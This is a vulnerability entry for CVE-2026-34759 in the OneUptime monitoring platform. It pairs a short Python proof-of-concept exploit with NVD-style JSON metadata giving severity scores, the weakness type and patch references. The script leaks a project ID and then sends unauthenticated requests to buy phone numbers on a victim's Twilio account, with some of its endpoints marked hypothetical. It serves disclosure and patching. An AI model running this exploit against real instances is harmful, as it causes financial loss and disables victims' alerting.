CVE-2026-34759

# PoC for CVE-2026-34759 # Demonstrates the lack of authentication on notification endpoints import requests target_url = "https://target-oneuptime-instance.com" # Step 1: Leak projectId from public Status Page API print("[+] Attempting to leak projectId...") status_api_response = requests.get(f"{target_url}/api/status-page/public") project_id = status_api_response.json().get('data', {}).get('projectId') # Hypothetical extraction if project_id: print(f"[+] ProjectId found: {project_id}") # Step 2: Exploit unauthenticated notification endpoint # Example: Purchasing a phone number via Twilio integration exploit_headers = { "Content-Type": "application/json" # Note: No Authorization header is sent due to the vulnerability } payload = { "projectId": project_id, "phoneNumber": "+15550199", "action": "purchase" } exploit_url = f"{target_url}/notification/endpoint" # Hypothetical vulnerable endpoint response = requests.post(exploit_url, json=payload, headers=exploit_headers) if response.status_code == 200: print("[+] Exploit successful! Action performed without authentication.") else: print("[-] Exploit failed.") else: print("[-] Could not retrieve projectId.")

{"cve": {"id": "CVE-2026-34759", "sourceIdentifier": "[email protected]", "published": "2026-04-02T19:21:33.833", "lastModified": "2026-04-13T18:45:18.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "OneUptime is an open-source monitoring and observability platform. Prior to version 10.0.42, multiple notification API endpoints are registered without authentication middleware, while sibling endpoints in the same codebase correctly use ClusterKeyAuthorization.isAuthorizedServiceMiddleware. These endpoints are externally reachable via the Nginx proxy at /notification/. Combined with a projectId leak from the public Status Page API, an unauthenticated attacker can purchase phone numbers on the victim's Twilio account and delete all existing alerting numbers. This issue has been patched in version 10.0.42."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 9.2, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "HIGH", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hackerbay:oneuptime:*:*:*:*:*:*:*:*", "versionEndExcluding": "10.0.42", "matchCriteriaId": "4F312DCA-BDD5-465F-9848-5CD35CDFC185"}]}]}], "references": [{"url": "https://github.com/OneUptime/oneuptime/commit/9adbd04538714740506708d6fa610e433be4d2a4", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/OneUptime/oneuptime/releases/tag/10.0.42", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/OneUptime/oneuptime/security/advisories/GHSA-6wc5-rhvj-cx7f", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Vendor Advisory"]}]}}